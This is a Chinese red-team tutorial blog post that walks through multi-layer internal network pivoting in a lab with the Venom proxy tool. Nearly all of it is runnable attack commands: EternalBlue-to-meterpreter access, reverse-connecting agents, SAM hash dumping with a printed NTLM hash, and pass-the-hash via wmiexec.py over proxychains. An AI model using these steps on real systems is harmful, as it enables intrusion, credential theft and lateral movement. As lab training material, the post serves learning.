红队渗透系列-内网穿透之Venom(毒液)三层内网穿透

实际操作视频地址请移步

https://www.bilibili.com/video/BV1x24y1o7WC/

venom 三层内网穿透

Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。

特点是部署简洁轻松,有网络拓扑和节点控制。

下载地址

https://github.com/Dliv3/Venom/releases/tag/v1.1.0

靶场拓扑图


部署步骤:

1.kali上执行venom,本地监听9999端口

#./admin_linux_x64 -lport 9999

2.利用永恒之蓝获取win7-1的shell,上传agent.exe,并执行

meterpreter > execute -f "c:\windows\temp\agent.exe -rhost 192.168.1.5 9999"

3.在跳板机win7-1上,获取administrator的hash,后面用pth攻击win2012

meterpreter > load kiwi

meterpreter > lsa_dump_sam

记下administrator的hash,lm:ntlm形式41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7

4.venom的(admin node) 节点下执行命令show

5.venom的(admin node) 节点下执行命令 goto 1

6.在node 1执行socks 1080,在kali 192.168.1.5上监听1080端口

(node 1) >>> socks 1080

7.设置代理proxychains

vi /etc/proxychains4.conf

socks5 192.168.1.5 1080

8.用wmiexec.py工具利用pth通过proxychains攻击win2012 10.10.10.13

proxychains python wmiexec.py administrator@10.10.10.13 -hashes 41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7 -codec gbk

8.1上传agent.exe到win2012 10.10.10.13上

9.在win7-1上执行监听9998端口

(node 1) >>> listen 9998

10.在win2012 10.10.10.13上执行agent.exe,反向链接win7-1 10.10.10.7的9998端口

C:\windows\temp>agent.exe -rhost 10.10.10.7 -rport 9998

11.在venom 上操作去节点2,并执行socks 1081 ,在kali上监听1081端口

(node 1) >>> goto 2

(node 2) >>> socks 1081

12.设置代理工具proxychains的代理端口为1081

13.通过代理工具proxychains远程链接10.10.20.7,成功

proxychains rdesktop 10.10.20.7

现在完成二层网络穿透,如果完成三层或者四层内网穿透,也是重复同样的步骤

https://www.bilibili.com/video/BV1x24y1o7WC/

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容